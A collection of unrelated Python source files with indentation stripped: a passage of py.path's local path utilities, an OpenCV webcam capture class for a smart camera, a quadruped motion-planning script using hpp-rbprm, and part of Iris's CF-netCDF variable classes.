directory upwards which still contains an __init__.py.
Return None if a pkgpath can not be determined.
"""
pkgpath = None
for parent in self.parts(reverse=True):
if parent.isdir():
if not parent.join('__init__.py').exists():
break
if not isimportable(parent.basename):
break
pkgpath = parent
return pkgpath
def _ensuresyspath(self, ensuremode, path):
if ensuremode:
s = str(path)
if ensuremode == "append":
if s not in sys.path:
sys.path.append(s)
else:
if s != sys.path[0]:
sys.path.insert(0, s)
def pyimport(self, modname=None, ensuresyspath=True):
""" return path as an imported python module.
If modname is None, look for the containing package
and construct an according module name.
The module will be put/looked up in sys.modules.
if ensuresyspath is True then the root dir for importing
the file (taking __init__.py files into account) will
be prepended to sys.path if it isn't there already.
If ensuresyspath=="append" the root dir will be appended
if it isn't already contained in sys.path.
if ensuresyspath is False no modification of syspath happens.
"""
if not self.check():
raise py.error.ENOENT(self)
pkgpath = None
if modname is None:
pkgpath = self.pypkgpath()
if pkgpath is not None:
pkgroot = pkgpath.dirpath()
names = self.new(ext="").relto(pkgroot).split(self.sep)
if names[-1] == "__init__":
names.pop()
modname = ".".join(names)
else:
pkgroot = self.dirpath()
modname = self.purebasename
self._ensuresyspath(ensuresyspath, pkgroot)
__import__(modname)
mod = sys.modules[modname]
if self.basename == "__init__.py":
return mod # we don't check anything as we might
# be in a namespace package ... too icky to check
modfile = mod.__file__
if modfile[-4:] in ('.pyc', '.pyo'):
modfile = modfile[:-1]
elif modfile.endswith('$py.class'):
modfile = modfile[:-9] + '.py'
if modfile.endswith(os.path.sep + "__init__.py"):
if self.basename != "__init__.py":
modfile = modfile[:-12]
try:
issame = self.samefile(modfile)
except py.error.ENOENT:
issame = False
if not issame:
raise self.ImportMismatchError(modname, modfile, self)
return mod
else:
try:
return sys.modules[modname]
except KeyError:
# we have a custom modname, do a pseudo-import
mod = py.std.types.ModuleType(modname)
mod.__file__ = str(self)
sys.modules[modname] = mod
try:
py.builtin.execfile(str(self), mod.__dict__)
except:
del sys.modules[modname]
raise
return mod
def sysexec(self, *argv, **popen_opts):
""" return stdout text from executing a system child process,
where the 'self' path points to executable.
The process is directly invoked and not through a system shell.
"""
from subprocess import Popen, PIPE
argv = map_as_list(str, argv)
popen_opts['stdout'] = popen_opts['stderr'] = PIPE
proc = Popen([str(self)] + argv, **popen_opts)
stdout, stderr = proc.communicate()
ret = proc.wait()
if py.builtin._isbytes(stdout):
stdout = py.builtin._totext(stdout, sys.getdefaultencoding())
if ret != 0:
if py.builtin._isbytes(stderr):
stderr = py.builtin._totext(stderr, sys.getdefaultencoding())
raise py.process.cmdexec.Error(ret, ret, str(self),
stdout, stderr,)
return stdout
def sysfind(cls, name, checker=None, paths=None):
""" return a path object found by looking at the systems
underlying PATH specification. If the checker is not None
it will be invoked to filter matching paths. If a binary
cannot be found, None is returned
Note: This is probably not working on plain win32 systems
but may work on cygwin.
"""
if isabs(name):
p = py.path.local(name)
if p.check(file=1):
return p
else:
if paths is None:
if iswin32:
paths = py.std.os.environ['Path'].split(';')
if '' not in paths and '.' not in paths:
paths.append('.')
try:
systemroot = os.environ['SYSTEMROOT']
except KeyError:
pass
else:
paths = [re.sub('%SystemRoot%', systemroot, path)
for path in paths]
else:
paths = py.std.os.environ['PATH'].split(':')
tryadd = []
if iswin32:
tryadd += os.environ['PATHEXT'].split(os.pathsep)
tryadd.append("")
for x in paths:
for addext in tryadd:
p = py.path.local(x).join(name, abs=True) + addext
try:
if p.check(file=1):
if checker:
if not checker(p):
continue
return p
except py.error.EACCES:
pass
return None
sysfind = classmethod(sysfind)
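# Illustrative usage (assuming a typical unix PATH):
#     py.path.local.sysfind('python')                              # LocalPath or None
#     py.path.local.sysfind('python', checker=lambda p: p.check(file=1))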
def _gethomedir(cls):
try:
x = os.environ['HOME']
except KeyError:
try:
x = os.environ["HOMEDRIVE"] + os.environ['HOMEPATH']
except KeyError:
return None
return cls(x)
_gethomedir = classmethod(_gethomedir)
#"""
#special class constructors for local filesystem paths
#"""
def get_temproot(cls):
""" return the system's temporary directory
(where tempfiles are usually created in)
"""
return py.path.local(py.std.tempfile.gettempdir())
get_temproot = classmethod(get_temproot)
def mkdtemp(cls, rootdir=None):
""" return a Path object pointing to a fresh new temporary directory
(which we created ourself).
"""
import tempfile
if rootdir is None:
rootdir = cls.get_temproot()
return cls(py.error.checked_call(tempfile.mkdtemp, dir=str(rootdir)))
mkdtemp = classmethod(mkdtemp)
def make_numbered_dir(cls, prefix='session-', rootdir=None, keep=3,
lock_timeout = 172800): # two days
""" return unique directory with a number greater than the current
maximum one. The number is assumed to start directly after prefix.
if keep is true directories with a number less than (maxnum-keep)
will be removed.
"""
if rootdir is None:
rootdir = cls.get_temproot()
nprefix = normcase(prefix)
def parse_num(path):
""" parse the number out of a path (if it matches the prefix) """
nbasename = normcase(path.basename)
if nbasename.startswith(nprefix):
try:
return int(nbasename[len(nprefix):])
except ValueError:
pass
# compute the maximum number currently in use with the
# prefix
lastmax = None
while True:
maxnum = -1
for path in rootdir.listdir():
num = parse_num(path)
if num is not None:
maxnum = max(maxnum, num)
# make the new directory
try:
udir = rootdir.mkdir(prefix + str(maxnum+1))
except py.error.EEXIST:
# race condition: another thread/process created the dir
# in the meantime. Try counting again
if lastmax == maxnum:
raise
lastmax = maxnum
continue
break
# put a .lock file in the new directory that will be removed at
# process exit
if lock_timeout:
lockfile = udir.join('.lock')
mypid = os.getpid()
if hasattr(lockfile, 'mksymlinkto'):
lockfile.mksymlinkto(str(mypid))
else:
lockfile.write(str(mypid))
def try_remove_lockfile():
# in a fork() situation, only the last process should
# remove the .lock, otherwise the other processes run the
# risk of seeing their temporary dir disappear. For now
# we remove the .lock in the parent only (i.e. we assume
# that the children finish before the parent).
if os.getpid() != mypid:
return
try:
lockfile.remove()
except py.error.Error:
pass
atexit.register(try_remove_lockfile)
# prune old directories
if keep:
for path in rootdir.listdir():
num = parse_num(path)
if num is not None and num <= (maxnum - keep):
lf = path.join('.lock')
try:
t1 = lf.lstat().mtime
t2 = lockfile.lstat().mtime
if not lock_timeout or abs(t2-t1) < lock_timeout:
continue # skip directories still locked
except py.error.Error:
pass # assume that it means that there is no 'lf'
try:
path.remove(rec=1)
except KeyboardInterrupt:
raise
except: # this might be py.error.Error, WindowsError ...
pass
# make link...
try:
username = os.environ['USER'] #linux, et al
except KeyError:
try:
username = os.environ['USERNAME'] #windows
except KeyError:
username = 'current'
src = str(udir)
dest = src[:src.rfind('-')] + '-' + username
try:
os.unlink(dest)
except OSError:
pass
try:
os.symlink(src, dest)
except (OSError, AttributeError, NotImplementedError):
pass
return udir
make_numbered_dir = classmethod(make_numbered_dir)
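# Illustrative usage: make_numbered_dir(prefix='run-') creates e.g.
# /tmp/run-7, prunes run-* directories numbered <= maxnum - keep (unless a
# fresh .lock file still protects them), and refreshes a 'run-<username>'
# symlink pointing at the newest directory.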
def copymode(src, dest):
""" copy permission from src to dst. """
py.std.shutil.copymode(src, dest)
def copystat(src, dest):
""" copy permission, last modification time, last access time, and flags from src to dst."""
py.std.shutil.copystat(str(src), str(dest))
def copychunked(src, dest):
chunksize = 524288 # half a meg of bytes
fsrc = src.open('rb')
try:
fdest = dest.open('wb')
try:
while 1:
buf = fsrc.read(chunksize)
if not buf:
break
fdest.write(buf)
finally:
fdest.close()
finally:
fsrc.close()
def isimportable(name):
if name and (name[0].isalpha() or name[0] == '_'):
name = name.replace("_", '')
return not name or name.isalnum()
# ---------------------------------------------------------------------------
"""
sc_webcam.py
This file includes functions to:
initialise a web cam
capture image from web cam
Image size is held in the smart_camera.cnf
"""
import sys
import time
import math
import cv2
import sc_config
class SmartCameraWebCam:
def __init__(self, instance):
# health
self.healthy = False
# record instance
self.instance = instance
self.config_group = "camera%d" % self.instance
# get image resolution
self.img_width = sc_config.config.get_integer(self.config_group,'width',640)
self.img_height = sc_config.config.get_integer(self.config_group,'height',480)
# background image processing variables
self.img_counter = 0 # num images requested so far
# latest image captured
self.latest_image = None
# setup video capture
self.camera = cv2.VideoCapture(self.instance)
# check we can connect to camera
if not self.camera.isOpened():
print ("failed to open webcam %d" % self.instance)
# __str__ - return description of the camera as a string
def __str__(self):
return "SmartCameraWebCam Object W:%d H:%d" % (self.img_width, self.img_height)
# latest_image - returns latest image captured
def get_latest_image(self):
# write to file
#imgfilename = "C:\Users\rmackay9\Documents\GitHub\ardupilot-balloon-finder\smart_camera\img%d-%d.jpg" % (cam_num,cam.get_image_counter())
imgfilename = "img%d-%d.jpg" % (self.instance,self.get_image_counter())
print (imgfilename)
cv2.imwrite(imgfilename, self.latest_image)
return self.latest_image
# get_image_counter - returns number of images captured since startup
def get_image_counter(self):
return self.img_counter
# take_picture - take a picture
# returns True on success
def take_picture(self):
# setup video capture
print("Taking Picture")
self.camera = cv2.VideoCapture(self.instance)
# modern OpenCV constant names (the cv2.cv submodule was removed in OpenCV 3)
self.camera.set(cv2.CAP_PROP_FRAME_WIDTH, self.img_width)
self.camera.set(cv2.CAP_PROP_FRAME_HEIGHT, self.img_height)
# check we can connect to camera
if not self.camera.isOpened():
self.healthy = False
return False
# get an image from the webcam
success_flag, self.latest_image = self.camera.read()
# release camera
self.camera.release()
# if successful overwrite our latest image
if success_flag:
self.img_counter = self.img_counter+1
return True
# return failure
return False
# main - tests SmartCameraWebCam class
def main(self):
while True:
# send request to image capture for image
if self.take_picture():
# display image
cv2.imshow ('image_display', self.get_latest_image())
else:
print ("no image")
# check for ESC key being pressed
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
# take a rest for a bit
time.sleep(0.01)
if __name__ == "__main__":
sc_webcam0 = SmartCameraWebCam(0)
sc_webcam0.main()
# ---------------------------------------------------------------------------
from hpp.corbaserver.rbprm.rbprmbuilder import Builder
from hpp.gepetto import Viewer
rootJointType = 'freeflyer'
packageName = 'hpp-rbprm-corba'
meshPackageName = 'hpp-rbprm-corba'
urdfName = 'hyq_trunk_large'
urdfNameRom = ['hyq_lhleg_rom','hyq_lfleg_rom','hyq_rfleg_rom','hyq_rhleg_rom']
urdfSuffix = ""
srdfSuffix = ""
rbprmBuilder = Builder ()
rbprmBuilder.loadModel(urdfName, urdfNameRom, rootJointType, meshPackageName, packageName, urdfSuffix, srdfSuffix)
rbprmBuilder.setJointBounds ("base_joint_xyz", [-2,5, -1, 1, 0.3, 4])
rbprmBuilder.setFilter(['hyq_rhleg_rom']) # , 'hyq_lfleg_rom', 'hyq_rfleg_rom','hyq_lhleg_rom'])
rbprmBuilder.setAffordanceFilter('hyq_rhleg_rom', ['Support', 'Lean'])
rbprmBuilder.boundSO3([-0.4,0.4,-3,3,-3,3])
from hpp.corbaserver.rbprm.problem_solver import ProblemSolver
ps = ProblemSolver( rbprmBuilder )
r = Viewer (ps)
r.loadObstacleModel (packageName, "darpa", "planning")
q_init = rbprmBuilder.getCurrentConfig ();
q_init [0:3] = [-2, 0, 0.63]; rbprmBuilder.setCurrentConfig (q_init); r (q_init)
q_goal = q_init [::]
q_goal [0:3] = [3, 0, 0.63]; r (q_goal)
ps.setInitialConfig (q_init)
ps.addGoalConfig (q_goal)
from hpp.corbaserver.affordance import Client
c = Client ()
c.affordance.analyseAll ()
objs = c.affordance.getAffordancePoints ("Support")
import random
count = 0
for aff in objs:
colour = random.random()
for tri in aff:
r.client.gui.addTriangleFace('tri' + str(count), tri[0], tri[1], tri[2], [colour, 1, 0.5, 1])
r.client.gui.addToGroup('tri' + str(count), 'planning')
count += 1
ps.client.problem.selectConFigurationShooter("RbprmShooter")
ps.client.problem.selectPathValidation("RbprmPathValidation",0.05)
t = ps.solve ()
from hpp.gepetto import PathPlayer
pp = PathPlayer (rbprmBuilder.client.basic, r)
pp (0)
# ---------------------------------------------------------------------------
"""
Provides the capability to load netCDF files and interpret them
according to the 'NetCDF Climate and Forecast (CF) Metadata Conventions'.
References:
[CF] NetCDF Climate and Forecast (CF) Metadata conventions.
[NUG] NetCDF User's Guide, https://www.unidata.ucar.edu/software/netcdf/documentation/NUG/
"""
from abc import ABCMeta, abstractmethod
from collections.abc import Iterable, MutableMapping
import os
import re
import warnings
import netCDF4
import numpy as np
import numpy.ma as ma
import iris.util
_CF_PARSE = re.compile(
r"""
\s*
(?P<lhs>[\w_]+)
\s*:\s*
(?P<rhs>[\w_]+)
\s*
""",
re.VERBOSE,
)
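# Example (illustrative): scanning a CF formula_terms attribute such as
#     "a: var_a b: var_b ps: surface_pressure"
# with _CF_PARSE.finditer() yields the (lhs, rhs) pairs
# ('a', 'var_a'), ('b', 'var_b') and ('ps', 'surface_pressure').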
_CF_ATTRS_IGNORE = set(
["_FillValue", "add_offset", "missing_value", "scale_factor"]
)
reference_terms = dict(
atmosphere_sigma_coordinate=["ps"],
atmosphere_hybrid_sigma_pressure_coordinate=["ps"],
atmosphere_hybrid_height_coordinate=["orog"],
atmosphere_sleve_coordinate=["zsurf1", "zsurf2"],
ocean_sigma_coordinate=["eta", "depth"],
ocean_s_coordinate=["eta", "depth"],
ocean_sigma_z_coordinate=["eta", "depth"],
ocean_s_coordinate_g1=["eta", "depth"],
ocean_s_coordinate_g2=["eta", "depth"],
)
def _is_str_dtype(var):
return np.issubdtype(var.dtype, np.bytes_)
class CFVariable(metaclass=ABCMeta):
"""Abstract base class wrapper for a CF-netCDF variable."""
#: Name of the netCDF variable attribute that identifies this
#: CF-netCDF variable.
cf_identity = None
def __init__(self, name, data):
# Accessing the list of netCDF attributes is surprisingly slow.
# Since it's used repeatedly, caching the list makes things
# quite a bit faster.
self._nc_attrs = data.ncattrs()
#: NetCDF variable name.
self.cf_name = name
#: NetCDF4 Variable data instance.
self.cf_data = data
#: Collection of CF-netCDF variables associated with this variable.
self.cf_group = None
#: CF-netCDF formula terms that this variable participates in.
self.cf_terms_by_root = {}
self.cf_attrs_reset()
@staticmethod
def _identify_common(variables, ignore, target):
if ignore is None:
ignore = []
if target is None:
target = variables
elif isinstance(target, str):
if target not in variables:
raise ValueError(
"Cannot identify unknown target CF-netCDF variable %r"
% target
)
target = {target: variables[target]}
else:
raise TypeError("Expect a target CF-netCDF variable name")
return (ignore, target)
@abstractmethod
def identify(self, variables, ignore=None, target=None, warn=True):
"""
Identify all variables that match the criterion for this CF-netCDF variable class.
Args:
* variables:
Dictionary of netCDF4.Variable instance by variable name.
Kwargs:
* ignore:
List of variable names to ignore.
* target:
Name of a single variable to check.
* warn:
Issue a warning if a missing variable is referenced.
Returns:
Dictionary of CFVariable instance by variable name.
"""
pass
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
result = set(self.dimensions).issubset(cf_variable.dimensions)
return result
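# Example (illustrative): a variable with dimensions ('time',) spans a
# target with dimensions ('time', 'lat', 'lon'), and a scalar variable
# (no dimensions) spans any target, since the empty set is a subset of
# every dimension set.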
def __eq__(self, other):
# CF variable names are unique.
return self.cf_name == other.cf_name
def __ne__(self, other):
# CF variable names are unique.
return self.cf_name != other.cf_name
def __hash__(self):
# CF variable names are unique.
return hash(self.cf_name)
def __getattr__(self, name):
# Accessing netCDF attributes is surprisingly slow. Since
# they're often read repeatedly, caching the values makes things
# quite a bit faster.
if name in self._nc_attrs:
self._cf_attrs.add(name)
value = getattr(self.cf_data, name)
setattr(self, name, value)
return value
def __getitem__(self, key):
return self.cf_data.__getitem__(key)
def __len__(self):
return self.cf_data.__len__()
def __repr__(self):
return "%s(%r, %r)" % (
self.__class__.__name__,
self.cf_name,
self.cf_data,
)
def cf_attrs(self):
"""Return a list of all attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr)) for attr in sorted(self._nc_attrs)
)
def cf_attrs_ignored(self):
"""Return a list of all ignored attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr))
for attr in sorted(set(self._nc_attrs) & _CF_ATTRS_IGNORE)
)
def cf_attrs_used(self):
"""Return a list of all accessed attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr)) for attr in sorted(self._cf_attrs)
)
def cf_attrs_unused(self):
"""Return a list of all non-accessed attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr))
for attr in sorted(set(self._nc_attrs) - self._cf_attrs)
)
def cf_attrs_reset(self):
"""Reset the history of accessed attribute names of the CF-netCDF variable."""
self._cf_attrs = set([item[0] for item in self.cf_attrs_ignored()])
def add_formula_term(self, root, term):
"""
Register the participation of this CF-netCDF variable in a CF-netCDF formula term.
Args:
* root (string):
The name of CF-netCDF variable that defines the CF-netCDF formula_terms attribute.
* term (string):
The associated term name of this variable in the formula_terms definition.
Returns:
None.
"""
self.cf_terms_by_root[root] = term
def has_formula_terms(self):
"""
Determine whether this CF-netCDF variable participates in a CF-netcdf formula term.
Returns:
Boolean.
"""
return bool(self.cf_terms_by_root)
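# Example (illustrative): given a vertical coordinate "lev" whose
# formula_terms attribute contains "ps: psurf", the loader calls
#     psurf_var.add_formula_term("lev", "ps")
# after which psurf_var.has_formula_terms() is True and
# psurf_var.cf_terms_by_root == {"lev": "ps"}.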
class CFAncillaryDataVariable(CFVariable):
"""
A CF-netCDF ancillary data variable is a variable that provides metadata
about the individual values of another data variable.
Identified by the CF-netCDF variable attribute 'ancillary_variables'.
Ref: [CF] Section 3.4. Ancillary Data.
"""
cf_identity = "ancillary_variables"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF ancillary data variables.
for nc_var_name, nc_var in target.items():
# Check for ancillary data variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF ancillary data variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFAncillaryDataVariable(
name, variables[name]
)
return result
class CFAuxiliaryCoordinateVariable(CFVariable):
"""
A CF-netCDF auxiliary coordinate variable is any netCDF variable that contains
coordinate data, but is not a CF-netCDF coordinate variable by definition.
There is no relationship between the name of a CF-netCDF auxiliary coordinate
variable and the name(s) of its dimension(s).
Identified by the CF-netCDF variable attribute 'coordinates'.
Also see :class:`iris.fileformats.cf.CFLabelVariable`.
Ref: [CF] Chapter 5. Coordinate Systems.
[CF] Section 6.2. Alternative Coordinates.
"""
cf_identity = "coordinates"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF auxiliary coordinate variables.
for nc_var_name, nc_var in target.items():
# Check for auxiliary coordinate variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF auxiliary coordinate variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
# Restrict to non-string type i.e. not a CFLabelVariable.
if not _is_str_dtype(variables[name]):
result[name] = CFAuxiliaryCoordinateVariable(
name, variables[name]
)
return result
class CFBoundaryVariable(CFVariable):
"""
A CF-netCDF boundary variable is associated with a CF-netCDF variable that contains
coordinate data. When a data value provides information about conditions in a cell
occupying a region of space/time or some other dimension, the boundary variable
provides a description of cell extent.
A CF-netCDF boundary variable will have one more dimension than its associated
CF-netCDF coordinate variable or CF-netCDF auxiliary coordinate variable.
Identified by the CF-netCDF variable attribute 'bounds'.
Ref: [CF] Section 7.1. Cell Boundaries.
"""
cf_identity = "bounds"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF boundary variables.
for nc_var_name, nc_var in target.items():
# Check for a boundary variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF boundary variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFBoundaryVariable(
name, variables[name]
)
return result
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore the bounds extent dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFClimatologyVariable(CFVariable):
"""
A CF-netCDF climatology variable is associated with a CF-netCDF variable that contains
coordinate data. When a data value provides information about conditions in a cell
occupying a region of space/time or some other dimension, the climatology variable
provides a climatological description of cell extent.
A CF-netCDF climatology variable will have one more dimension than its associated
CF-netCDF coordinate variable.
Identified by the CF-netCDF variable attribute 'climatology'.
Ref: [CF] Section 7.4. Climatological Statistics
"""
cf_identity = "climatology"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF climatology variables.
for nc_var_name, nc_var in target.items():
# Check for a climatology variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF climatology variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFClimatologyVariable(
name, variables[name]
)
return result
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
        Note that, by default, scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore the climatology extent dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFCoordinateVariable(CFVariable):
"""
A CF-netCDF coordinate variable is a one-dimensional variable with the same name
as its dimension, and it is defined as a numeric data type with values that are
ordered monotonically. Missing values are not allowed in CF-netCDF coordinate
variables. Also see [NUG] Section 2.3.1.
Identified by the above criterion, there is no associated CF-netCDF variable
attribute.
Ref: [CF] 1.2. Terminology.
"""
@classmethod
def identify(
cls, variables, ignore=None, target=None, warn=True, monotonic=False
):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF coordinate variables.
for nc_var_name, nc_var in target.items():
if nc_var_name in ignore:
continue
# String variables can't be coordinates
if _is_str_dtype(nc_var):
continue
# Restrict to one-dimensional with name as dimension
if not (nc_var.ndim == 1 and nc_var_name in nc_var.dimensions):
continue
# Restrict to monotonic?
if monotonic:
data = nc_var[:]
# Gracefully fill a masked coordinate.
if ma.isMaskedArray(data):
data = ma.filled(data)
if (
nc_var.shape == ()
or nc_var.shape == (1,)
or iris.util.monotonic(data)
):
result[nc_var_name] = CFCoordinateVariable(
nc_var_name, nc_var
)
else:
result[nc_var_name] = CFCoordinateVariable(nc_var_name, nc_var)
return result
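# For reference, only numeric, one-dimensional variables named after their own
# dimension are identified above, e.g. (hypothetical netCDF4 dataset):
#
#     dataset.createVariable("lat", "f8", ("lat",))      # identified
#     dataset.createVariable("name", "S1", ("n", "s"))   # skipped: string type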
class CFDataVariable(CFVariable):
"""
A CF-netCDF variable containing data pay-load that maps to an Iris :class:`iris.cube.Cube`.
"""
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
raise NotImplementedError
class _CFFormulaTermsVariable(CFVariable):
"""
A CF-netCDF formula terms variable corresponds to a term in a formula that
allows dimensional vertical coordinate values to be computed from dimensionless
vertical coordinate values and associated variables at specific grid points.
Identified by the CF-netCDF variable attribute 'formula_terms'.
Ref: [CF] Section 4.3.2. Dimensional Vertical Coordinate.
[CF] Appendix D. Dimensionless Vertical Coordinates.
"""
cf_identity = "formula_terms"
def __init__(self, name, data, formula_root, formula_term):
CFVariable.__init__(self, name, data)
# Register the formula root and term relationship.
self.add_formula_term(formula_root, formula_term)
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF formula terms variables.
for nc_var_name, nc_var in target.items():
# Check for formula terms variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for match_item in _CF_PARSE.finditer(nc_var_att):
match_group = match_item.groupdict()
# Ensure that term name is lower case, as expected.
term_name = match_group["lhs"].lower()
variable_name = match_group["rhs"]
if variable_name not in ignore:
if variable_name not in variables:
if warn:
message = "Missing CF-netCDF formula term variable %r, referenced by netCDF variable %r"
warnings.warn(
message % (variable_name, nc_var_name)
)
else:
if variable_name not in result:
result[
variable_name
] = _CFFormulaTermsVariable(
variable_name,
variables[variable_name],
nc_var_name,
term_name,
)
else:
result[variable_name].add_formula_term(
nc_var_name, term_name
)
return result
def __repr__(self):
return "%s(%r, %r, %r)" % (
self.__class__.__name__,
self.cf_name,
self.cf_data,
self.cf_terms_by_root,
)
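# For reference, a CF 'formula_terms' attribute is a string of "term: variable"
# pairs in the form given by [CF] Appendix D (variable names hypothetical):
#
#     sigma:formula_terms = "sigma: sigma ps: surface_pressure ptop: ptop"
#
# _CF_PARSE yields (lhs, rhs) pairs such as ("ps", "surface_pressure"), and
# each referenced variable is registered against its root and term name.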
class CFGridMappingVariable(CFVariable):
"""
A CF-netCDF grid mapping variable contains a list of specific attributes that
define a particular grid mapping. A CF-netCDF grid mapping variable must contain
the attribute 'grid_mapping_name'.
Based on the value of the 'grid_mapping_name' attribute, there are associated
standard names of CF-netCDF coordinate variables that contain the mapping's
independent variables.
Identified by the CF-netCDF variable attribute 'grid_mapping'.
Ref: [CF] Section 5.6. Horizontal Coordinate Reference Systems, Grid Mappings, and Projections.
[CF] Appendix F. Grid Mappings.
"""
cf_identity = "grid_mapping"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all grid mapping variables.
for nc_var_name, nc_var in target.items():
# Check for a grid mapping variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF grid mapping variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFGridMappingVariable(
name, variables[name]
)
return result
class CFLabelVariable(CFVariable):
"""
    A CF-netCDF label variable is any netCDF variable that contains
    string textual information, or labels.
Identified by the CF-netCDF variable attribute 'coordinates'.
Also see :class:`iris.fileformats.cf.CFAuxiliaryCoordinateVariable`.
Ref: [CF] Section 6.1. Labels.
"""
cf_identity = "coordinates"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF label variables.
for nc_var_name, nc_var in target.items():
# Check for label variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF label variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
# Register variable, but only allow string type.
var = variables[name]
if _is_str_dtype(var):
result[name] = CFLabelVariable(name, var)
return result
def cf_label_data(self, cf_data_var):
"""
Return the associated CF-netCDF label variable strings.
Args:
* cf_data_var (:class:`iris.fileformats.cf.CFDataVariable`):
The CF-netCDF data variable which the CF-netCDF label variable describes.
Returns:
String labels.
"""
if not isinstance(cf_data_var, CFDataVariable):
raise TypeError(
"cf_data_var argument should be of type CFDataVariable. Got %r."
% type(cf_data_var)
)
# Determine the name of the label string (or length) dimension by
# finding the dimension name that doesn't exist within the data dimensions.
str_dim_name = list(set(self.dimensions) - set(cf_data_var.dimensions))
if len(str_dim_name) != 1:
raise ValueError(
"Invalid string dimensions for CF-netCDF label variable %r"
% self.cf_name
)
str_dim_name = str_dim_name[0]
label_data = self[:]
if ma.isMaskedArray(label_data):
label_data = label_data.filled()
# Determine whether we have a string-valued scalar label
# i.e. a character variable that only has one dimension (the length of the string).
if self.ndim == 1:
label_string = b"".join(label_data).strip()
label_string = label_string.decode("utf8")
data = np.array([label_string])
else:
# Determine the index of the string dimension.
str_dim = self.dimensions.index(str_dim_name)
# Calculate new label data shape (without string dimension) and create payload array.
new_shape = tuple(
dim_len for i, dim_len in enumerate(self.shape) if i != str_dim
)
string_basetype = "|U%d"
string_dtype = string_basetype % self.shape[str_dim]
data = np.empty(new_shape, dtype=string_dtype)
for index in np.ndindex(new_shape):
# Create the slice for the label data.
if str_dim == 0:
label_index = (slice(None, None),) + index
else:
label_index = index + (slice(None, None),)
label_string = b"".join(label_data[label_index]).strip()
label_string = label_string.decode("utf8")
data[index] = label_string
return data
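    # Sketch of the conversion above (hypothetical shapes): a character array
    # of shape (2, 4) holding b'warm' / b'cold', paired with data dimensions
    # ('region',), becomes np.array(['warm', 'cold'], dtype='|U4').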
def cf_label_dimensions(self, cf_data_var):
"""
Return the name of the associated CF-netCDF label variable data dimensions.
Args:
* cf_data_var (:class:`iris.fileformats.cf.CFDataVariable`):
The CF-netCDF data variable which the CF-netCDF label variable describes.
Returns:
Tuple of label data dimension names.
"""
if not isinstance(cf_data_var, CFDataVariable):
raise TypeError(
"cf_data_var argument should be of type CFDataVariable. Got %r."
% type(cf_data_var)
)
return tuple(
[
dim_name
for dim_name in self.dimensions
if dim_name in cf_data_var.dimensions
]
)
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
        Note that, by default, scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
